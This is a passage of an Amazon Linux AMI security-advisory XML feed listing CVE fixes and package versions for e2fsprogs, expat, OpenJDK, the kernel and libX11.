arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1458</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1458: medium priority package update for e2fsprogs</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5188:
A code execution vulnerability exists in the directory rehashing functionality of E2fsprogs e2fsck 1.45.4. A specially crafted ext4 directory can cause an out-of-bounds write on the stack, resulting in code execution. An attacker can corrupt a partition to trigger this vulnerability.
1790048: CVE-2019-5188 e2fsprogs: Out-of-bounds write in e2fsck/rehash.c
CVE-2019-5094:
An exploitable code execution vulnerability exists in the quota file functionality of E2fsprogs 1.45.3. A specially crafted ext4 partition can cause an out-of-bounds write on the heap, resulting in code execution. An attacker can corrupt a partition to trigger this vulnerability.
1768555: CVE-2019-5094 e2fsprogs: Crafted ext4 partition leads to out-of-bounds write
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5094" title="" id="CVE-2019-5094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5188" title="" id="CVE-2019-5188" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="e2fsprogs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-libs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-libs-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libcom_err" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libcom_err-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcom_err-devel-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libss-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-devel-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="libss" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libss-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-debuginfo-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-static-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/e2fsprogs-devel-1.43.5-2.44.amzn1.x86_64.rpm</filename></package><package name="e2fsprogs-static" version="1.43.5" release="2.44.amzn1" epoch="0" 
arch="i686"><filename>Packages/e2fsprogs-static-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libcom_err-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-devel-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libss" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libss-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs-libs" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-libs-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs-debuginfo" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-debuginfo-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libcom_err" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libcom_err-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="libss-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libss-devel-1.43.5-2.44.amzn1.i686.rpm</filename></package><package name="e2fsprogs-devel" version="1.43.5" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/e2fsprogs-devel-1.43.5-2.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1459</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1459: medium priority package update for expat</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15903:
In libexpat before 2.2.8, crafted XML input could fool the parser into changing from DTD parsing to document parsing too early; a consecutive call to XML_GetCurrentLineNumber (or XML_GetCurrentColumnNumber) then resulted in a heap-based buffer over-read.
1752592: CVE-2019-15903 expat: heap-based buffer over-read via crafted XML input
CVE-2018-20843:
It was discovered that the "setElementTypePrefix()" function incorrectly extracted XML namespace prefixes. By tricking an application into processing a specially crafted XML file, an attacker could cause unusually high consumption of memory resources and possibly lead to a denial of service.
1723723: CVE-2018-20843 expat: large number of colons in input makes parser consume high amount of resources, leading to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20843" title="" id="CVE-2018-20843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15903" title="" id="CVE-2019-15903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="12.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-12.24.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-12.24.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-12.24.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="12.24.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-12.24.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="12.24.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-12.24.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="12.24.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-12.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1460</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1460: medium priority package update for java-1.8.0-openjdk</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14803:
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
1889895: CVE-2020-14803 OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136)
CVE-2020-14797:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
1889717: CVE-2020-14797 OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)
CVE-2020-14796:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1889697: CVE-2020-14796 OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680)
CVE-2020-14792:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N).
1889280: CVE-2020-14792 OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114)
CVE-2020-14782:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
1889290: CVE-2020-14782 OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)
CVE-2020-14781:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
1889274: CVE-2020-14781 OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990)
CVE-2020-14779:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1889271: CVE-2020-14779 OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization, 8236862)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14779" title="" id="CVE-2020-14779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14781" title="" id="CVE-2020-14781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14782" title="" id="CVE-2020-14782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14792" title="" id="CVE-2020-14792" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14796" title="" id="CVE-2020-14796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14797" title="" id="CVE-2020-14797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14803" title="" id="CVE-2020-14803" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.272.b10" release="1.56.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1461</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1461: medium priority package update for kernel</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8694:
A flaw was found in the Linux kernel's implementation of Intel's Running Average Power Limit (RAPL) interface. A local attacker could infer secrets by measuring power usage, and could also infer private data by observing the power usage of calculations performed on that data.
1828580: CVE-2020-8694 kernel: Insufficient access control vulnerability in PowerCap Framework
CVE-2020-28974:
An out-of-bounds (OOB) SLAB memory access flaw was found in the Linux kernel's fbcon driver module. A bounds check failure allows a local attacker with special user privileges to gain access to out-of-bounds memory, leading to a system crash or leaking of internal kernel information. The highest threat from this vulnerability is to system availability.
A slab-out-of-bounds read in fbcon in the Linux kernel before 5.9.7 could be used by local attackers to read privileged information or potentially crash the kernel, aka CID-3c4e0dff2095. This occurs because KD_FONT_OP_COPY in drivers/tty/vt/vt.c can be used for manipulations such as font height.
1903126: CVE-2020-28974 kernel: slab-out-of-bounds read in fbcon
CVE-2020-28941:
An issue was discovered in drivers/accessibility/speakup/spk_ttyio.c in the Linux kernel through 5.9.9. Local attackers on systems with the speakup driver could cause a local denial of service attack, aka CID-d41227544427. This occurs because of an invalid free when the line discipline is used more than once.
99999: CVE-2020-28941 kernel: NULL pointer dereference in spk_ttyio_ldisc_close function in drivers/accessibility/speakup/spk_ttyio.c
CVE-2020-27777:
No description is available for this CVE.
A flaw was found in the way RTAS handled memory accesses in userspace to kernel communication. On a locked down (usually due to Secure Boot) guest system running on top of PowerVM or KVM hypervisors (pseries platform), a root-like local user could use this flaw to further increase their privileges to that of the running kernel.
1900844: CVE-2020-27777 kernel: powerpc: RTAS calls can be used to compromise kernel integrity
CVE-2020-27675:
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. drivers/xen/events/events_base.c allows event-channel removal during the event-handling loop (a race condition). This can cause a use-after-free or NULL pointer dereference, as demonstrated by a dom0 crash via events for an in-reconfiguration paravirtualized device, aka CID-073d0552ead5.
99999: CVE-2020-27675 kernel: xen: race condition in event-channel removal during the event-handling loop (XSA-331)
CVE-2020-27673:
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. Guest OS users can cause a denial of service (host OS hang) via a high rate of events to dom0, aka CID-e99502f76271.
99999: CVE-2020-27673 kernel: xen: guest OS users can cause a DoS via a high rate of events to dom0 (XSA-332)
CVE-2020-25704:
A memory leak flaw was found in the Linux kernel performance monitoring subsystem in the way it handles PERF_EVENT_IOC_SET_FILTER. A local user could use this flaw to exhaust system resources, causing a denial of service.
1895961: CVE-2020-25704 kernel: perf_event_parse_addr_filter memory
CVE-2020-25669:
No description is available for this CVE.
1892176: CVE-2020-25669 kernel: use-after-free read in sunkbd_reinit in drivers/input/keyboard/sunkbd.c
CVE-2020-25668:
No description is available for this CVE.
1893287: CVE-2020-25668 kernel: race condition in fg_console can lead to use-after-free in con_font_op
CVE-2020-25656:
A flaw was found in the Linux kernel. A use-after-free was found in the way the console subsystem was using the ioctls KDGKBSENT and KDSKBSENT. A local user could use this flaw to read memory out of bounds. The highest threat from this vulnerability is to data confidentiality.
1888726: CVE-2020-25656 kernel: use-after-free in read in vt_do_kdgkb_ioctl
CVE-2020-14351:
A flaw was found in the Linux kernel. A use-after-free memory flaw was found in the perf subsystem allowing a local attacker with permission to monitor perf events to corrupt memory and possibly escalate privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1862849: CVE-2020-14351 kernel: performance counters race condition use-after-free
CVE-2019-19770:
A use-after-free flaw was found in the debugfs_remove function in the Linux kernel. The flaw could allow a local attacker with special user (or root) privilege to crash the system at the time of file or directory removal. This vulnerability can lead to a kernel information leak. The highest threat from this vulnerability is to system availability.
1786179: CVE-2019-19770 kernel: use-after-free in debugfs_remove in fs/debugfs/inode.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19770" title="" id="CVE-2019-19770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14351" title="" id="CVE-2020-14351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25656" title="" id="CVE-2020-25656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25668" title="" id="CVE-2020-25668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25669" title="" id="CVE-2020-25669" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25704" title="" id="CVE-2020-25704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27673" title="" id="CVE-2020-27673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27675" title="" id="CVE-2020-27675" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27777" title="" id="CVE-2020-27777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28941" title="" id="CVE-2020-28941" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28974" title="" id="CVE-2020-28974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8694" title="" id="CVE-2020-8694" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.209" 
release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.209" release="117.337.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.209-117.337.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.209" release="117.337.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-headers-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.209-117.337.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.209" release="117.337.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.209-117.337.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1462</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1462: important priority package update for libX11</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14363:
An integer overflow vulnerability leading to a double-free was found in libX11. This flaw allows a local privileged attacker to cause an application compiled with libX11 to crash, or in some cases, result in arbitrary code execution. The highest threat from this flaw is to confidentiality, integrity as well as system availability.
1872473: CVE-2020-14363 libX11: integer overflow leads to double free in locale handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14363" title="" id="CVE-2020-14363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.13.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.13.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.13.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.13.amzn1.i686.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" 